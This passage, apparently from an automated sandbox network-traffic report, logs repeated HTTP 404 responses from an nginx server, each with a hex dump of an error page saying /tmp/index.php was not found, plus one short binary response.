64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 